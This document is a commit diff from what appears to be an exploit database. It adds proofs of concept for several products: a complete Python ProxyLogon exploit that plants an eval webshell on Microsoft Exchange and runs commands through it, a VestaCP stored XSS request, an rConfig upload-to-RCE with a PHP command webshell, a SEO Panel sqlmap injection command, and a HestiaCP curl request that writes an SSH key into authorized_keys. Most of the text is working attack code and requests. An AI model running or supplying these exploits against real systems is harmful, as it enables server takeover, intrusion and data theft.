DB: 2021-03-19

9 changes to exploits/shellcodes VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) WordPress Plugin Wp-FileManager 6.8 - RCE Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) (PoC) rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated) VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS SEO Panel 4.8.0 - 'order_col' Blind SQL Injection Hestia Control Panel 1.3.2 - Arbitrary File Write rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)
2021-03-19 05:02:05 +00:00 · 2021-03-19 05:02:05 +00:00 · 1f32ac253c
commit 1f32ac253c
parent 2dc4594d19
8 changed files with 347 additions and 3 deletions
--- a/exploits/multiple/webapps/49662.txt
+++ b/exploits/multiple/webapps/49662.txt
@ -0,0 +1,24 @@
+# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS
+# Date: 07.03.2021
+# Author: Numan Türle
+# Vendor Homepage: https://vestacp.com
+# Software Link: https://myvestacp.com < 0.9.8-26-43
+# Software Link: https://vestacp.com < 0.9.8-26
+# Tested on: VestaCP
+
+POST /add/ip/ HTTP/1.1
+Host: TARGET:8083
+Connection: close
+Content-Length: 165
+Cache-Control: max-age=0
+Origin: https://TARGET:8083
+Content-Type: application/x-www-form-urlencoded
+User-Agent: USER-AGENT
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: https://TARGET:8083/add/ip/
+Accept-Encoding: gzip, deflate
+Accept-Language: en,tr-TR;
+Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0
+sec-gpc: 1
+
+token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add
--- a/exploits/php/webapps/49178.bash
+++ b/exploits/php/webapps/49178.bash
--- a/exploits/php/webapps/49665.txt
+++ b/exploits/php/webapps/49665.txt
@ -0,0 +1,70 @@
+# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)
+# Date: 2021-03-17
+# Exploit Author: Murat ŞEKER
+# Vendor Homepage: https://www.rconfig.com
+# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
+# Version: rConfig v3.9.6
+# Install scripts  :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Tested on: centOS 7
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+
+# Description:
+rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'.
+
+The following steps can be carried out in duplicating this vulnerability.
+
+- Login the rConfig application with your credentials.
+- Repeat 
+
+POST /lib/crud/vendors.crud.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254
+Content-Length: 36619
+Origin: https://localhost
+Connection: close
+Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref
+Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b
+Upgrade-Insecure-Requests: 1
+Cache-Control: no-transform
+
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="vendorName"
+
+thisisrce
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="vendorLogo"; filename="file.php"
+Content-Type: image/png
+
+<?php phpinfo(); ?>
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="add"
+
+add
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="editid"
+
+
+-----------------------------122590832918963661283831488254--
+
+
+
+- Than go to http(s)://<SERVER>/images/vendor/file.php
+
+Note: The file.php can be accessed without valid credentials.
+
+
+If you change the <?php phpinfo(); ?> to <?php echo $_GET["cmd"];?>
+
+and navigate the http(s)://<SERVER>/images/vendor/file.php?cmd=id
+
+The `id` command will execute on server.
--- a/exploits/php/webapps/49666.txt
+++ b/exploits/php/webapps/49666.txt
@ -0,0 +1,15 @@
+# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
+# Date: 17/02/2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
+# Version: 4.8.0
+
+
+# Reference - https://github.com/seopanel/Seo-Panel/issues/209
+
+Step 1 - Login to the SEO Panel with admin credentials.
+Step 2 - Go to archive.php
+Step 3 - Change "order_col" value to "*" and copy the request
+Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
+--dbs --technique=T --flush-session
--- a/exploits/php/webapps/49667.txt
+++ b/exploits/php/webapps/49667.txt
@ -0,0 +1,17 @@
+# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
+# Date: 07.03.2021
+# Author: Numan Türle
+# Vendor Homepage: https://hestiacp.com/
+# Software Link: https://github.com/hestiacp/hestiacp
+# Version: < 1.3.3
+# Tested on: HestiaCP Version 1.3.2
+
+curl --location --request POST 'https://TARGET:8083/api/index.php' \
+--form 'hash="HERE_API_KEY"' \
+--form 'returncode="yes"' \
+--form 'cmd="v-make-tmp-file"' \
+--form 'arg1="ssh-rsa HERE_KEY"' \
+--form 'arg2="/home/admin/.ssh/authorized_keys"' \
+--form 'arg3=""' \
+--form 'arg4=""' \
+--form 'arg5=""'
--- a/exploits/windows/local/49661.txt
+++ b/exploits/windows/local/49661.txt
@ -0,0 +1,29 @@
+# Exploit Title: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path
+# Date: 2021-2-6
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://vfsforgit.org/
+# Software Link: https://github.com/microsoft/VFSForGit/releases/download/v1.0.21014.1/SetupGVFS.1.0.21014.1.exe
+# Version: 1.0.21014.1
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc GVFS.Service
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: GVFS.Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\GVFS\GVFS.Service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : GVFS.Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
--- a/exploits/windows/remote/49663.py
+++ b/exploits/windows/remote/49663.py
@ -0,0 +1,183 @@
+import requests
+from urllib3.exceptions import InsecureRequestWarning
+import random
+import string
+import sys
+
+
+def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
+    return ''.join(random.choice(chars) for _ in range(size))
+
+if len(sys.argv) < 2:
+    print("使用方式: python PoC.py <target> <email>")
+    print("使用方式: python PoC.py mail.btwaf.cn test2@btwaf.cn")
+    exit()
+
+proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+target = sys.argv[1]
+email = sys.argv[2]
+random_name = id_generator(4) + ".js"
+user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
+
+shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"
+shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
+
+# webshell-马子内容
+shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>'
+
+autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
+    <Request>
+      <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
+    </Request>
+</Autodiscover>
+""" % email
+
+print("正在获取Exchange Server " + target+"权限")
+print("=============================")
+FQDN = "EXCHANGE01"
+ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
+                                                                        "User-Agent": user_agent},
+                  verify=False,proxies=proxies)
+
+if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
+    FQDN = ct.headers["X-FEServer"]
+
+
+ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
+    "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
+    "Content-Type": "text/xml",
+    "User-Agent": user_agent},
+                   data=autoDiscoverBody,
+                    proxies=proxies,
+                   verify=False
+                   )
+
+if ct.status_code != 200:
+    print(ct.status_code)
+    print("Autodiscover Error!")
+    exit()
+
+if "<LegacyDN>" not in str(ct.content):
+    print("Can not get LegacyDN!")
+    exit()
+
+legacyDn = str(ct.content).split("<LegacyDN>")[1].split(r"</LegacyDN>")[0]
+print("Got DN: " + legacyDn)
+
+mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
+
+ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
+    "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
+    "Content-Type": "application/mapi-http",
+    "X-Requesttype": "Connect",
+    "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
+    "X-Clientapplication": "Outlook/15.0.4815.1002",
+    "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",
+    "User-Agent": user_agent
+},
+                   data=mapi_body,
+                   verify=False,
+proxies=proxies
+                   )
+if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
+    print("Mapi Error!")
+    exit()
+
+sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0]
+
+print("Got SID: " + sid)
+sid = sid.replace(sid.split("-")[-1],"500")
+
+proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
+""" % sid
+
+ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
+    "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
+    "Content-Type": "text/xml",
+    "msExchLogonMailbox": "S-1-5-20",
+    "User-Agent": user_agent
+},
+                   data=proxyLogon_request,
+proxies=proxies,
+                   verify=False
+                   )
+if ct.status_code != 241 or not "set-cookie" in ct.headers:
+    print("Proxylogon Error!")
+    exit()
+
+sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
+
+msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
+print("Got session id: " + sess_id)
+print("Got canary: " + msExchEcpCanary)
+
+ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
+    "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
+        FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
+    "Content-Type": "application/json; ",
+    "msExchLogonMailbox": "S-1-5-20",
+    "User-Agent": user_agent
+
+},
+                   json={"filter": {
+                       "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
+                                      "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}},
+                   verify=False
+                   )
+
+if ct.status_code != 200:
+    print("GetOAB Error!")
+    exit()
+oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]
+print("Got OAB id: " + oabId)
+
+oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
+            "properties": {
+                "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
+                               "ExternalUrl": "http://ffff/#%s" % shell_content}}}
+
+ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
+    "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
+        FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
+    "msExchLogonMailbox": "S-1-5-20",
+    "Content-Type": "application/json; charset=utf-8",
+    "User-Agent": user_agent
+},
+                   json=oab_json,
+                   verify=False
+                   )
+if ct.status_code != 200:
+    print("Set external url Error!")
+    exit()
+
+reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
+                  "properties": {
+                      "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
+                                     "FilePathName": shell_absolute_path}}}
+
+ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
+    "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
+        FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
+    "msExchLogonMailbox": "S-1-5-20",
+    "Content-Type": "application/json; charset=utf-8",
+    "User-Agent": user_agent
+},
+                   json=reset_oab_body,
+                   verify=False
+                   )
+
+if ct.status_code != 200:
+    print("写入shell失败了啊")
+    exit()
+
+print("成功了。马上就验证shell是否OK!")
+print("POST  shell:https://"+target+"/owa/auth/test11.aspx")
+shell_url="https://"+target+"/owa/auth/test11.aspx"
+print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')
+print("正在请求shell")
+data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False)
+if data.status_code != 200:
+    print("写入shell失败")
+else:
+    print("权限如下："+data.text.split("OAB (Default Web Site)")[0].replace("Name                            : ",""))
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11291,6 +11291,7 @@ id,file,description,date,author,type,platform,port
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
 49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
+49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18411,6 +18412,7 @@ id,file,description,date,author,type,platform,port
 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
 49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,
+49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43515,7 +43517,7 @@ id,file,description,date,author,type,platform,port
 49174,exploits/php/webapps/49174.txt,"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover",2020-12-02,"Mufaddal Masalawala",webapps,php,
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
-49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49178,exploits/php/webapps/49178.sh,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
@ -43833,15 +43835,19 @@ id,file,description,date,author,type,platform,port
 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,
 49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware,
 49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php,
-49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-11,testanull,webapps,windows,
+49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) (PoC)",2021-03-11,testanull,webapps,windows,
 49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",2021-03-12,"Richard Jones",webapps,php,
 49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",2021-03-12,"Richard Jones",webapps,php,
 49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",2021-03-15,"Balaji Ayyasamy",webapps,php,
 49643,exploits/php/webapps/49643.txt,"MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery",2021-03-15,bl4ckh4ck5,webapps,php,
-49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,5a65726f,webapps,php,
+49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php,
 49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
 49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
 49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
 49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php,
 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,
 49659,exploits/multiple/webapps/49659.html,"VestaCP 0.9.8 - File Upload CSRF",2021-03-17,"Fady Mohammed Osman",webapps,multiple,
+49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple,
+49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php,
+49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,
+49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,